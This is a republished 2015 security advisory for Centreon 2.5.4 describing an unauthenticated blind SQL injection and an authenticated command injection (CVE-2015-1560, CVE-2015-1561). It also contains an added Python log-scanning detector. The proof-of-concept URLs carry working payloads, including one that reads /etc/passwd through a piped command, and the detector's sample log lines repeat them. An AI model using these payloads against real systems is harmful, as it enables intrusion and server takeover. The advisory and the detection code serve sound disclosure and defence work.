Centreon 2.5.4 - Multiple Vulnerabilities

Published: 08 Jul 2015 00:00:00
Reported by: Huy-Ngoc DAU
Type: zdt
Source: 0day.today

Merethis Centreon 2.5.4 - Unauthenticated blind SQLi and authenticated remote command execution affecting real-time IT performance monitoring

Related

Reporter | Title | Published | Family
Tenable Nessus | Centreon GetXmlTree.php 'sid' Parameter SQLi | 31 Aug 2016 00:00 | nessus
CNVD | Merethis Centreon 'getStats.php' Remote Command Execution Vulnerability | 14 Jul 2015 00:00 | cnvd
CNVD | Merethis Centreon 'isUserAdmin()' Function SQL Injection Vulnerability | 14 Jul 2015 00:00 | cnvd
CVE | CVE-2015-1560 | 14 Jul 2015 16:00 | cve
CVE | CVE-2015-1561 | 14 Jul 2015 16:00 | cve
Cvelist | CVE-2015-1560 | 14 Jul 2015 16:00 | cvelist
Cvelist | CVE-2015-1561 | 14 Jul 2015 16:00 | cvelist
Exploit DB | Centreon 2.5.4 - Multiple Vulnerabilities | 8 Jul 2015 00:00 | exploitdb
EUVD | EUVD-2015-1694 | 7 Oct 2025 00:30 | euvd
EUVD | EUVD-2022-3503 | 3 Oct 2025 20:07 | euvd

Merethis Centreon - Unauthenticated blind SQLi and Authenticated Remote Command Execution
 
CVEs: CVE-2015-1560, CVE-2015-1561
 
Vendor: Merethis - www.centreon.com
Product: Centreon
Version affected: 2.5.4 and prior
 
Product description:
Centreon is the choice of some of the world's largest companies and mission-critical organizations for real-time IT performance monitoring and diagnostics management. (from https://www.centreon.com/en/)
 
Advisory introduction:
Centreon 2.5.4 is susceptible to multiple vulnerabilities, including unauthenticated blind SQL injection and authenticated remote system command execution.
 
Credit: Huy-Ngoc DAU of Deloitte Conseil, France
 
================================
Finding 1: Unauthenticated Blind SQL injection in isUserAdmin function (CVE-2015-1560)
================================
The vulnerable function is "isUserAdmin" (defined in include/common/common-Func.php), in which the unsanitized "sid" GET parameter is used in a SQL query.
 
PoC:
https://example.domain/centreon/include/common/XmlTree/GetXmlTree.php?sid=%27%2Bif(1%3C2,sleep(1),%27%27)%2B%27
https://example.domain/centreon/include/common/XmlTree/GetXmlTree.php?sid=%27%2Bif(1%3C0,sleep(1),%27%27)%2B%27
 
By exploiting CVE-2015-1560, an attacker can obtain, among other things, a valid session_id, which is required to exploit CVE-2015-1561.
 
================================
Finding 2: Authenticated Command Execution in getStats.php (CVE-2015-1561)
================================
The $command_line variable, which is passed to the popen function, is constructed from unsanitized GET parameters.
 
PoC (a valid session_id value is required):
- Reading /etc/passwd by injecting a command into the "ns_id" parameter:
http://example.domain/centreon/include/Administration/corePerformance/getStats.php?ns_id=|+more+/etc/passwd+%23&key=active_service_check&start=today&session_id=[valid session_id]
- Injecting "uname -a" into the "end" parameter:
http://example.domain/centreon/include/Administration/corePerformance/getStats.php?ns_id=1&key=active_service_check&start=today&end=|+uname+-a+%23&session_id=[valid session_id]
 
By combining the two vulnerabilities, an unauthenticated attacker can take control of the web server.
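 
A detection check for the two findings above, as an added example that is not part of the original advisory or of Centreon's code: it flags access-log requests to the two affected endpoints whose parameter values fall outside an expected shape. The value patterns (session id format, numeric ns_id, simple tokens for key/start/end) and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed shapes of legitimate values (not taken from Centreon's source).
SESSION_ID = re.compile(r"[A-Za-z0-9,-]{1,128}")  # PHP-style session id
NUMERIC = re.compile(r"\d+")                      # poller id
TOKEN = re.compile(r"[A-Za-z0-9_:-]+")            # keyword or timestamp

# Endpoint path suffix -> {parameter name: allowed pattern}
RULES = {
    "/include/common/XmlTree/GetXmlTree.php": {"sid": SESSION_ID},
    "/include/Administration/corePerformance/getStats.php": {
        "ns_id": NUMERIC, "key": TOKEN, "start": TOKEN, "end": TOKEN,
        "session_id": SESSION_ID,
    },
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(log_line):
    """Names of parameters on the two advisory endpoints whose decoded value
    falls outside the expected shape; empty list for any other request."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    for suffix, rules in RULES.items():
        if url.path.endswith(suffix):
            # parse_qs percent-decodes values and turns '+' into a space
            params = parse_qs(url.query)
            return sorted(name for name, values in params.items()
                          if name in rules
                          and not all(rules[name].fullmatch(v) for v in values))
    return []

# Constructed access-log lines (combined log format, documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Feb/2015:09:14:02 +0100] "GET /centreon/include/common/XmlTree/GetXmlTree.php?sid=%27%2Bif(1%3C2,sleep(1),%27%27)%2B%27 HTTP/1.1" 200 312',
    '198.51.100.7 - - [03/Feb/2015:09:15:40 +0100] "GET /centreon/include/common/XmlTree/GetXmlTree.php?sid=4f2a9c0b7d1e HTTP/1.1" 200 2048',
    '192.0.2.10 - - [03/Feb/2015:09:20:11 +0100] "GET /centreon/include/Administration/corePerformance/getStats.php?ns_id=1&key=active_service_check&start=today&end=|+uname+-a+%23&session_id=4f2a9c0b7d1e HTTP/1.1" 200 97',
    '198.51.100.7 - - [03/Feb/2015:09:21:05 +0100] "GET /centreon/include/Administration/corePerformance/getStats.php?ns_id=1&key=active_service_check&start=today&session_id=4f2a9c0b7d1e HTTP/1.1" 200 5120',
    '198.51.100.7 - - [03/Feb/2015:09:21:30 +0100] "GET /centreon/main.php?p=1 HTTP/1.1" 200 9000',
]

def scan(lines):
    """Return (line number, flagged parameter names) for each suspicious line."""
    return [(n, hits) for n, line in enumerate(lines, 1)
            if (hits := suspicious_params(line))]
```

Calling scan(SAMPLE_LOG) reports lines 1 and 3; tighten the patterns to the value formats your own deployment actually produces before relying on the results.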
 
================================
Timeline
================================
26/01/2015 - Vulnerabilities discovered
29/01/2015 - Vendor notified
05/02/2015 - Vendor fixed SQLi 
13/02/2015 - Vendor fixed RCE
 
References
Vendor fixes:
- SQLi : https://forge.centreon.com/projects/centreon/repository/revisions/d14f213b9c60de1bad0b464fd6403c828cf12582
- Command execution : https://forge.centreon.com/projects/centreon/repository/revisions/d14f213b9c60de1bad0b464fd6403c828cf12582

#  0day.today [2018-01-10]  #
